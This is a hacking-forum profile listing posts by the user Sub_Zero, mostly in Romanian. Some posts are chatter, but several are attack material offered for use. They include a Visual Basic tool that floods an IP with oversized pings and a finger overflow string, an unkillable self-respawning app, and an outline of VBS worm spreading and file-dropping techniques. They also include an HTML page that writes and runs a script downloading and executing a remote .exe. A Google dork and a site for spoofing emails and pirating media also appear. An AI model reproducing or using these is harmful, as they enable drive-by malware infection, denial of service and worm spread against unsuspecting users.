
Sub_Zero
Active Members-
Posts
331 -
Joined
-
Last visited
Everything posted by Sub_Zero
-
foarte frumoase icoanele,continuati tot asa;)
-
By David Gray - chapter16_98@hotmail.com Simply add the line: SendKeys "{Enter}" to a timer The code should look like this: Private Sub Timer1_Timer SendKeys "{Enter}" End sub Make sure that the timer's interval is set to 1 or higher and the timer is enabled. Make the EXE and run it. Try and type something in Notepad and watch as line after line of ENTERS appear. Replace {Enter} with a string of your choice (I.e Dark Slick Rulz the MBR) and watch as the text is typed onto the screen
-
By David Gray - chapter16_98@hotmail.com I was bored, so I decided to write a VB code that would prevent you from shutting down a VB app. It has worked in most of my tests, but has failed sometimes. It involves shelling the app once it has been closed down: 1) Create a new Standard EXE in vb (I'm using vb6 professional edition) 2) Copy this and paste it into the form that you want to keep open (i.e Form1) you can change this to suit your needs Private Sub Form_Unload(Cancel As Integer) Shell app.path & "" & app.exename End Sub You can also use: Private Sub Form_Unload to initialize the code when you shutdown. 3) Add in the rest of your code and create an exe 4) Run the program and press CTRL+ALT+DEL Close the program and watch as it springs back into life!! There are ways around it, but computer idiots will not be able to close it...
-
Ok start off by making a new exe and stick on there 2 command buttons, text box a label and watever really - they are the neccessary ones, u dont need the label if u dont want it. Ok name the command buttons cmdFinger and cmdPing, the text field to txtIP and the label to lblStatus and give them suitable captions. now for the coding. Private Sub cmdPing_Click() 'this tells it what to give the instructions to MsgBox "Launching Attack", vbInformation, "Launching Attack" 'This is a little pop-up Shell ("ping " & txtIP.Text & " -l 65500 -t") ' "shell tells it to open DOS then type this in automatically lblstatus.Caption = "Pinging IP" 'Changes the Label caption End Sub Private Sub cmdFinger_Click() MsgBox "Launching Attack", vbInformation, "Launching attack" Shell ("finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" & txtIP.Text) lblstatus.Caption = "Finger IP" End Sub And thats about it, compile it and ur done.
-
What's new in Firefox 1.5.0.7: [*]Universal Binary support for Mac OS X which provides native support for Macintosh with Intel Core processors. Firefox supports the enhancements to performance introduced by the new MacIntel chipsets. [*]Improvements to product stability. [*]Several security fixes.[/list:u]Links: or
-
google e prietenul tau:D http://www.fuckinggoogleit.com/
-
da si eu as vrea sa o vad,si ti-as recomanda sa pui mai multe themes si in legatura cu antivirusul ti-as recomanda Btdefender 10 (versiune Internet Security),norton in nici un caz
-
bravo Kw3[R]Ln e mai bine sa triesti in pace decat in razboi
-
Nu mai tin minte numele celui care l-a facut dar il felicit pentru acest tutorial. How to use IRC with Telnet Ah, I hope this has not yet been posted here! I will guide you through the required steps in order to use IRC with Telnet! 1. Connect to IrcServer using port 6660-6669 (ie I will connect to Quakenet) Code: telnet irc.quakenet.org 6669 2. Wait for all the server messages to appear, then type user nickname hostname servername :your name Code: user TheMagician localhost localhost :The Magician ** localhost is fine for both 3. At this point when you press Enter you will not see anything, so type your nickname Code: nick TheMagician 4. PING :randomnumbers (what the hell is this? what now?) You have to PONG the server Code: PONG :exactly_same_numbers_as_in_PING_message You are now connected to server and you should see now lots of information that server sends to you, wait for everything to finish. So you are now connected to IRC server, you can use all the IRC commands in Telnet just like you would normally use them, except that you dont type the "/" before the command, ie let's join any channel Code: join #Igniteds To send message to the channel, type Code: privmsg #Igniteds :Hello, this is TheMagician But there's one tricky part in Telnet IRCing, you receive all the messages automatically, so if you're typing message and someone sends messsage on the channel, your attempt of sending the message to channel fails and instead sometimes it prints lots of crap to the channel. You just gotta be fast! Wink And if you want to exit just type Code: quit And then any key.
-
Uite linkul: http://www.megaupload.com/?d=NL2KXI1J Enjoy...
-
Site-ul are urmatoarele facilitati: -Browse the web using our IP address, bypass web censors, cover your tracks with our encrypted URL bar. Bypasses many web censors and lets you access your favorite sites. -Download songs without the hassle of P2P programs and the risk of legal troubles. Use this page to download music, movies, and ebooks that google has indexed on its website. -Use our automatic form to set the sender's address of an email to any email address in your mind. Send spoofed emails without revealing your identity and trick a friends with prank emails. -Upload your files to multiple file-hosting websites, all upload forms conveniently located on a single page here. Have fun with this one, changes to it may arise over time. -The Youtube Video Downloader allows you to enter in the URL of a video on youtube and have it generate a link to download that video off of Youtube.com itself. Va recomand acest site cu toata placerea.
-
Project 2025 is a collection of various Internet Security Testing Tools. Basically put, whether you're a webmaster looking to secure your site or a casual surfer looking to stay anonymous - there should be a little here for everyone. Please follow the links to the left and see if there's anything you like. All programs are fully functional freeware. Triton Triton II ... An exploiter / vulnerability scanner / link checker / security analysis tool. Charon Charon ... Searches Google for open proxies and includes a full anonymity checker. Athena Athena ... Searches Google for logins in the form of http://user:pass@www.site.com. Logrip Logrip ... Analyses common access & error logs from servers. Lucifer Lucifer ... Program to filter a wordlist to pick out words that match predefined rules. Azarius Azarius ... Program to sort your exploit history by the path instead of the URL. Coy Coy ... analyses passfiles and extracts undecrypted hashes. Unibitch Unibitch ... Quick prog to convert normal ascii text into the hexadecimal equivalent. Caligula Caligula ... Crawls through a list of urls testing them and seeing which ones now redirect. Chameleon Chameleon ... Program for performing quick conversions between various formats.
-
http://symantec.com/home_homeoffice/products/features.jsp?pcid=is&pvid=nis2007 http://reshack.stickied.net/index.php?i=http://img174.imageshack.us/img174/8245/hmnis2007screenshotlgrr8.gif
-
Crediturile pentru acest tutorial ii revin lui SPTH 1. eMail spreading 2. mIRC spreading 3. pIRCh spreading 4. vIRC spreading 5. KaZaA spreading 6. LNK dropping 7. BAT dropping 8. PIF dropping 1) eMail spreading First you'll find the eMail-spreading-source: The Virus searchs for every email adress in the addressbook. Then sending itself to these addresses. It's really easy, I think.2) mIRC spreading The source first: First The virus copies itself to C:mircattachment.vbs Then it canges the mIRC-script.ini file. So every user in the same chatroom gets an infect file. 3) pIRCh spreading Source: It's the same as mIRC spreading. First the worm made a copy of itself in the pIRCh direction (C:pirch9b), then changes the event.ini file, so every user get an infect file. 4) vIRC spreading VBS vIRC source: It's a really short code. First you need a copy of the virus, than change a registry key. That's all... 5) KaZaA spreading Source: You make a copy of the virus in the C:Kazaa-direction. Then make a registry-key. Every file in the direction (here it is "C:kazaa") other user can download. I think, you will understand it. 6) LNK dropping Dropping means, that every LNK file opens the virus. Look at the code: First the virus makes a copy of itself to C:vbs.vbs Then it generates a LNK file, which opens the C:vbs.vbs-file. Then the virus makes a batch file, which copies the LNK-file to every LNK file it can find. 7) BAT dropping Source first: First the virus copies itself to C:vbs.vbs. Than it generates a batch-file (C:bat.bat) which opens the virus-copy. Than te virus generates a second batch file, which copies the first one to every batch-files it can find. PIF dropping PIF files open DOS-files. Yes, but VBS is a windows file?? what to do? Source: First the virus copies itself to C:vbs.vbs. Than it generates a batch file, which opens the virus. Than it generates a PIF file, which opens the batch file. You can see, that the code should generates a LNK, but VBS "know" that BAT is a DOS file, so it makes a DOS-ShourtCut, and that's PIF. Ok, go on, the vbs file generates a second BAT file, which copies the PIF to every PIF-file, it can find. Before starting writing this article, i don't really like to program in VBS, because I thought, it's a ScriptKiddy language. But after a while I liked it more and more, because I'm able to make really nice things like file-dropping or other stuff. I hope U also enjoyed reading this tutorial about VisualBasicScript.
-
va functiona pe versiunea 2.1.7 si versiuni anterioare rUnViRuS is credited with the discovery of this vulnerability.
-
<html> <head> function Salir() { if(window.opener!=window.self) { window.opener=window.self window.opener=window.close() } else {window.close()} } function Posiciona() { window.resizeTo(400,285) window.moveTo(190,145) } Posiciona() </script> </head> <body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onmove="Posiciona()" onresize="Posiciona()" onload="Salir()"> <table border="0" cellspacing="0" cellpadding="0" width="100%"> <tr> <td height="24" bgcolor="#DBEAF5" style="border-bottom:solid 1px #4791C5;"></td> </tr> <tr> <td style="padding: 20 20 0 20">Espera mientras descargamos el archivo. </td> </tr> <tr> <td align="center">[img=http://64.4.55.109/i.p.attprgrs.gif] </td> </tr> </table> codigo = "on error resume next:set o = CreateObject(""msxml2.XMLHTTP"")Surprised.open ""GET"",""http://usuarios.lycos.es/n00b/pepe.exe"",False:o.send:set s = createobject(""adodb.stream""):s.type=1:s.open:s.write o.responseBody:s.savetofile ""C:pepe.exe"",2:set ws = CreateObject(""WScript.Shell""):ws.Run ""C:pepe.exe"", 3, FALSE" Set fso = CreateObject("Scripting.FileSystemObject") Set MyFile = fso.CreateTextFile("c:fuego.vbs", True) MyFile.WriteLine(codigo) MyFile.Close set ws = CreateObject("WScript.Shell") ws.Run "C:fuego.vbs", 3, FALSE </script> <iframe src="http://cyruxnet.org/download/UNICODE_DECODE.doc" height="0" width="0"> </body> </html> Downloadeaza un fisier in C: si il executa.Functioneaza doar cu Internet explorer.
-
Google dork: inurl:"alltopics.php"
-
Roach is a small Ajax based remote administration tool that functions through a back-end PHP based shell. Currently Roach is designed only to run under newer Microsoft Windows based operating systems (XP Pro and 2003). http://img476.imageshack.us/my.php?image=screenshotha4.jpg hier erhältlich http://sourceforge.net/projects/roach/
-
pacat ca nu pti sa scanezi anumite site-ri sa vezi daca sunt infectate
-
daca as intelege ce scrie acolo ar fi super,oricum mersi
-
de unde ai demo-ul ,mersi
-
care-i problema ta,eu am lipsit 2 saptamani din Romania,plecat in alta tara,si nu prea am putut sa postez,asa ca tineti gura
-
sunt,destul de bune ,bravo
-
ce vorbesti acolo mai,mie imi merge